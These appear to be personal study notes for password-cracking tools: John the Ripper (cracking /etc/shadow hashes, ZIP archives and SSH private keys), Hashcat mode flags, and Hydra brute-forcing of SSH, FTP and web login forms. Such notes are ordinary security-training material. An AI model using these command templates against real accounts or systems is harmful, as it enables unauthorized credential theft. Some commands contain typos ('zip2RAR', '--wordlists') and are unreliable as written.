John The Ripper
John detects type of hash:
john --wordlists=/path <path to file>
To id your hash use: python3 hash-id.py
Specfic hash type:
john --format=hash-type --wordlist=/path <path to file>
-raw prefix made need to be used
Cracking hashes from etc/shadow:
Need to first unshadow
unshadow passwd file shadow file > outputfilename
Then crack
using syntax from above
Single Crack Mode:
john --single --format=hash type <file name>
GECOs
Geco fields are the records between the : (colons) you see in passwd files
Cracking ZIP/RAR protected files:
zip2john zipfilename > OutputFileName
zip2RAR zipfilename > OutputFileName
-Then crack the OutputfileName using the standard john syntax
Cracking SSH2John:
-Converts the id_rsa pirivate key into a hash format
-Download ssh2john or use /opt/john/ss2john.py
ssh2john id_rsa private key > OutputFileName.txt
-Then crack the hash using the above syntax
Hashcat
https://hashcat.net/wiki/doku.php?id=hashcat - Use to find hash mode and type of attack code
-m = select hash mode (example 0 is MD5)
-a = select attack type (example 0 is dictionary attack)
syntax example:
hashcat -m 0 -a 0 <hash file> <path to wordlist>
Hydra
-l = (small L) provide the username
-L = provide username list path
-P = provide wordlist path
-t = number of threads
ssh/ftp/http-get/http-post-form = service type
If cracking a http post form, open dev tools (inspect element) select network tab and submit the credentials. View the full details, ie: url, how user and pass are sent to server and make note of the error message.
hydra -l admin -P <wordlist> <machine-ip> http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:Username or password incorrect" -V
Using service on non standard port
hydra -l admin -P <wordlist> <machine-ip> FTP -s 2121